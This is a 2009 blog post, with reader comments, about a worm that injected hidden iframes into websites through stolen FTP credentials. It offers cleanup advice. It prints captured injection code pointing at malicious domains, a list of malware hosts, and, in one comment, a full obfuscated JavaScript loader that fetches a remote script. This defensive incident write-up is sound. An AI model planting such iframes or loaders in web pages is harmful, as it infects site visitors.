Hidden iframe injection attacks
[Updated on October 27, 2009 with new a version of the script]
It is a shame that after all those posts about security, some of my websites were under attack today.
Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack.
All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.
To the html pages the following piece of code was added:
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
To php pages it added:
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Asha took the effort and cleaned most of the infected files. We are monitoring the status now.
How did the worm inject the hidden iframes to my files?
There are two ways through which the worm is believed to infect your files:
1) Server is compromised
This is the most common way. Some o the websites residing in the same web server as your website may be compromised (o it may be some vulnerabilities in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites in the server.
2) Client side FTP
The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.
When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.
How can I recover from a hidden iframe injection attack?
Here are a few tips that might help you:
- The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
- Notify your web host about the attack and advice them to take measures against a possible server wide attack.
- Change the file permissions in your server to the maximum secure mode.
- Download all your files from the server and check for infections. Clean the infected files.
- Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
- Never use public computers to access your server.
How do I clean infected files?
Use these regular expressions to search for all pages containig the malicious code and replace it with space:
<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;
You may have to write a script to automate this for all the files in the server.
I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.
You may want to change some hardcoded values inside the file.
Then visit the url:
http://www.yourdomain.com/clean.php?c=iframe
The parameter c specifies the text to search for inside the file. The results will be something like:
It will search all the files in your website and if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.
Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.
Will my search engine rankings be affected by this attack?
Try to be fast with these steps because if a visitor see the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave way for more sophisticated attacks.
Google will mark your site in it’s search results with a warning: “This site may harm your computer”.
Use the following link to see what google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
As mentioned above, you must remove the malware from your local machine using some antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.
Note that when visiting an infected site, some antivirus softwares prompt you that “Trojan Horse Downloader”, an exe-file is trying to get loaded. Once the exe infects your machine, it will infect your server too.
Here are some more code samples caught from the wild:
<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>
There are obfuscated versions of the attack code too:
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.
Here is a list of some other websites that host malicious content:
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net/
http://live-counter.net
http://klinoneshoes.info
protection-livescan.com/
http://webexperience13.com
http://q5x.ru
http://q5x.rugumblar.cnmartuz.cnbeladen.net38zu.cngoogleanalytlcs.netlousecn.cnfqwerz.cnd99q.cnorgsite.info94.247.2.094.247.2.195http://mmsreader.comhttp://google-ana1yticz.comhttp://my2.mobilesect.infohttp://thedeadpit.comhttp://internetcountercheck.comhttp://165.194.30.123http://ruoo.infogogo2me.net/http://live-counter.nethttp://klinoneshoes.infoprotection-livescan.com/http://webexperience13.comhttp://q5x.ru
If you find these urls in any code in your website, that is a sure shot sign that you are infected.
« « Authenticity | Updating your resume » »
Is that the real URL? If so maybe consider adjusting it slightly so no-one accidentally goes to it and gets infected.
Let it be.
Some people are coming to this page from the search term “goooogleadsence.biz”. I hope this article will help them.
Anyway I have not provided any clickable links. So I think there is no harm. If you copy and paste the url to the address bar, you better know what you are doing.
Hey,
This totally happened to me and we are investigating the cause because it is a serious liability issue to us right now. Who is your hosting provider? Is it RackSpace?
Thanks,
Charles
We had this problem happen to us on the mosso rackspace servers…
@Anon @Charles .. Dont tell me that you are having this issues with Rackspace servers?
I thoght they are good compared to Cable and Wireless…. We have moved our company sites from C&W to Rackspace.
I don’t think the issue is with any specific hosting provider (unless they screwed up their passwords).
This worm infects the files if it some how managed to sniff your ftp/cpanel password. The best way to prevent the attack is to change your passwords frequently. Never login to your server ftp/cpanel accounts from public computers(or virus infected computers).
Did you ever get any answers from Mosso? Did they own up to this? We are having the same issue, changed passwords, reuploaded files to see what would happen and bam…string included again.
Nothing running on our site, just hosting files.
“changed passwords, reuploaded files to see what would happen and bam…string included again”
This is a sure shot indiation that the machine that you are using to access the server is infected by a spyware/malware.
So this is a new case, eh?
Thanks for the information. It’s really helpful..
I usually use password banks for my logins….
you might want to update the original post with how this worm operates for those coming thru searches.
Having the same problem with a lot of sites under our account with Dreamhost. I told them about the problem and it doesn’t appear they give too much of a damn.
Furthermore, there was a second attack where code pointing to a site hosted on the Dreamhost servers was the recipient of the iframe traffic. Can you believe that they asked me to contact the website owner myself and “discuss” it with him. Yea, coz he must be sooo upset about the extra 5-10K visits per day he’s getting!
Wankers
Spoke too soon – a rep contacted me and it looks like they’re gonna help out as much as they can.
Cool!
Hi,
This virus is not related to the host, but its related to client side malware.
This can be detected through Avast (try free version and it works well). This malware gets the ftp details from the session, connects the site you last connected through ftp, downloads index.* (index.html, index.htm, index.php, index.aspx etc), inserts the iframe code and finally uploads back to the server.
This malware can be detected by avas and your system will be free from that, but it doesnt cure the files on the server.
To cure files on the server, I am trying to write a script from past few days and seems its going to work fine, just fine-tuning the script as of now and will be releasing it soon.
The script is written in php file, so if you have php support on your server, this script is going to fix your problems.
Regards,
Dave.
Dave,
Let us know when the script is ready.
Hi,
We’ve got the same problem. It seems that one of our dev team have that malvare on their clients. They will clean it up tomorrow.
I have found this http://www.yourjoomlapro.com/ . Anyone bought that script? Seems to be from Dave who posted already something here (?).
Regards
Pippo
OK guys same problem bloody ass hole spyware see for your self
)
counterstrike.co.nz
Some one please help me
Guys, This is not host issue, what I believe is its client side worm,
I faced same problem with some of my old clients even very new client who just came for this ISSUE only
we found same iframes and today I just found this goooogleadsence code in iframe in one of my client’s website.
I myself cleaned many websites but it just comes in a very short time again..
I cleaned my machine its not infected but i found my office machines are infected with some worms, avats and NOD32 finds this well.
If you have nod32 or avast you won’t be able to open website, this anti virus will block website and warn you abut threat,
Etrust doen’t block website, it just let you go and open it. but doesn’t download the worm on your machine i guess…
wel there is no plenty of solution available yet as there are so many web onwers / developers faceting the same issue
my recent sites attacked are http://www.waytogrowrich.com and http://www.webtail.de
attack again and again…
Hi,
Have got the fix script ready, check at http://www.yourjoomlapro.com
Some more details here: http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/
[...] suspicious, I google about it. Then I find this post: http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/. I finally know that the script was added somehow to my files by a virus. Yes, it is my own [...]
Hey, I’ve made a wordpress plugin that will block (not remove) the script from being executed.
Check at http://www.nazieb.com/466/blocks-the-annoying-goooogleadsencebiz-iframe/. (beta version)
It’s totally free.
I have had a dozen sites infected, and my experience so far is that:
it targets any file with “index” in the file name. it also targets any file with “main” in the file name. my iframes were pointing to chinese ads.
@Dave,
I bought your script and it worked, thanks! You saved me a bunch of time trying to write the script myself, well worth every penny.
One modification that I made was to include other sources–I had iframes pulling from 3 different sources rather than just goooogleadsence.biz.
Also the hackers target in addition to pages named index, home and default, pages named main, as well as cms specific pages like Drupals maintenance-page.tpl.php and MovableTypes php/extlib/smarty/libs/plugins/modifier.default.php.
Hope that helps somebody.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
[...] friend Niyaz was bugging me for a while now, asking me to write an asp.net code for removing malicious code from [...]
I guess all of you are using Total Commander with saved passwords? The virus is stealing your saved passwords, nothing else.
hey guys,
i had the same problem in most of my sites on the server. Until i’ll find who’s responsible for injecting those iframes i changed all of index & home pages rights to r–r–r– and as far as now everything seems to be ok.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.
Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.
Cheers
Akash
[...] Hidden iframe injection attacks | Diovo [...]
I got infected too. I found the tool to remove the infection…
i think it is here
http://www.sulumitsretsambew.org/iframe-worms/
Hi,
Another one hosting malicious code is xcount.cc which have infected my site.
Hello, my site is got infected too by this virus iframe…is there any script that can remove that virus? thanks
Thank you very much. My Web site was infected with this worm and following your indications I have been able to eliminate it. THANKS again.
spiderx that worm removal tool is actualy here
http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/
thank you very much, i finally removed this thing.
Thanks for the info and the script. Your script is quite useful.
I have had the same issue with this worm, it has been driving me nuts. I currently use FTP Commander to access my site and I have not had a problem since. It only attacks the index.php files and adds the iframe code at the end of the script, and corrupts it. I only seemed to have the issue when I used Internet Explorer to access my FTP folders. You will need to immediately change your FTP password, and use another software package to edit your FTP site other than IE. This has gotten me many times within the last week.
Your clean.php file is a big help on finding these issues. thanks.
@Garrett,
Glad it helped!
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ http://blog.tigertech.net/posts/ftp-virus-spreading/ [...]
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
Hi
I see code injections with encrypted javascript like following.
“document.write(unescape(“%3c%69%66%72%61%6d%65%20%73%72%6
Clean up any such code which is not inserted by you in your site code. Use some decryption sites or application to see actual link.
I want to really thank you for your post here about the issue. It completely took down our site just days before a very important VC meeting. Without the excellent writeup you posted about this issue we wold have been sunk. Your writing ws clear, the problem was well described and your clean.php file worked great. Kudos!!!!!
Wow cool man .
Thanks that my server admin does a great job . So my site is not effected .
Hi,
very helpful article. Add to the malicious site list this: http://asfirey.net/?click=FA62A
yes big kudos, how frustrating
as if there isnt already enought to do rather than spend days fighting this thing
had nearly 100 sitea affected
will check the clean script out and the other one and post back here hjow it goes
[...] and others providing blogging solutions, in all evenhandedness I’m extending this gesture; kindly [Click to view] the blog. I can be reached if not well [...]
really a usefull info that u were given in this article
thak you very much…
but im in doubt
im using adsense will your script that u have cooked
[ clean.php.txt ] will affect my earnings through adsense
plzzzz mail to me
plzzzzz i want reply…..
[...] i started searching on the net and found some interesting information on the blog of Niyaz PK. I followed his intructions step by step and hopefully everything is back to normal now. I have [...]
website saya beberapa waktu ini terkena juga trojan ini. saya check di google safe browsing ternyata jaringan dimana hosting saya terletak memang telah diinfeksi. saya sudah lapor ke penyedia hosting. mungkin terpaksanya saya memakai reguler expression yang di ajarkan disini demi keamanan
terima kasih informasinya
We had to battle an inframe attack a few months ago and it is right that this is not a server issue. THe first time it happened we turned the site off to the public and cleaned all of the infected pages uploaded and we were good for about 8 hours then it happened again. SO this time we ran avast which had already been running on the computers since new and it found nothing so again we reuploaded all of the cleaned files and bam again it shows up. Now we were getting pissed so on advice from another developer we tried malewarebytes and there they were multiple malware found on the computer. SO we used malewarebytes to deal with what it found and we went out and got Norton for all computers that access our ftp servers and have not had a problem since. We also did change the passwords for the site each time we were attacked. So in summary do not be cheap with anti virus software it cost us hours and hours of time and a couple of of site down time that could have been prevented by just having adequate ant ivrus in the first place.
We also found maleware using malewarebytes which may have been how some of our client websites had been compromised through FTP access leaving us with a trail of iframe infected index files.
We have since blocked all FTP access and setup the plesk firewal to only allow safe IP addresse’s that wehave gathered from the know clients that use the FTP.
Two day now and we have had no trouble.
What a nuisance.
Thanks for the informative post, and thanks those who commented with more info.
I’m running on a major US web host, and just suffered this very issue.
I’m in the process of documenting new FTP usage policies for accessing production hosting servers. Are there any other precautions that should be taken, besides those here?
Dear Sir,
I read over you’re blog and thank you i found alot of issues from this hidden iframe it just started to attack both my music sites and server recently and well i am having hell trying to remove everything since the sites are so big can you contact me personally and possibly i can pay you to secure my system?
Matthew Nalett
admin@newmusicpromote.com
PS : Only the admin of this blog who posted this tutorial please email me thank you.
I have tried to run the script in the root directory but avast tells me to abort the connection.
Should I ignore avast and let the page load?
[...] of the attack. You should also change your password for your site immediately. There are various sites on how to recover files and clean up your [...]
I know how find & clean your infected files on your site.
If you interested – icq 274314 one one 8
Is there a way by which i can search all the files??????????
not only the specified files with the given file name but all the files!!
can u??? plsssssssss
Dheeraj,
I have modified the script. It now does search in all the files. Beware that it will search in all file including css, js, images, etc. and so if you have very large files, the search will be slow.
thanks a lot!!!! ur script has saved me!! thnq!
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
[...] than illustrating all steps here, this website was one of the best ones to explain the necessary steps. Make sure you download the PHP script that scans your [...]
Do you have any script for Cold Fusion? tq
thanks for the post, this php iframe injection thing is completely new to me – so any help is good
If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian (http://www.serverprogress.com/upload_guardian.php). It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.
[...] עם תוסף מתאים תגלו כי הושתל בדפיו קוד זדוני או Iframes ממקורות בלתי מזוהים. כעת גם התוצאות של גוגל המובילות לבלוג כוללות אזהרה: [...]
Thanks for the informative post, and thanks those who commented with more info.
Hi….
Thanks a billion Diovo.
Malware which effected to my site :
(document.write(”);)
I found your blog while googling about asfirey Malware.
Your code for identifying infected files worked for me.
I am able to locate where exactly Malware effected webpages on my site.
I searched, deleted infected files from my site and I uploaded new files.
Now my site if fine and opening correctly.
Thanks again!
wow… thank for the information… actually the hidden iframe was for cookie stuffing blackhat… for getting affiliate cookie on people who open the website… when people click on the advertisement then they will get the profit for themself… no the web owner who display the ads…
thanks..
it is helpful
I found the following code at last part to my index files:
/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(’script’);Xs1ya4t7ajb13i.setAttribute(‘type’, ‘text/javascript’);Xs1ya4t7ajb13i.setAttribute(‘id’, ‘myscript1′);Xs1ya4t7ajb13i.setAttribute(’src’, ‘h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#’.replace(/&|\(|#|\!|\)|\^|\$|@/ig, ”));Xs1ya4t7ajb13i.setAttribute(‘defer’, ‘defer’);document.body.appendChild(Xs1ya4t7ajb13i);}} catch(e) {}
what about y how I eliminate it?
Please check my article about this virus:
http://justcoded.com/article/gumblar-family-virus-removal-tool/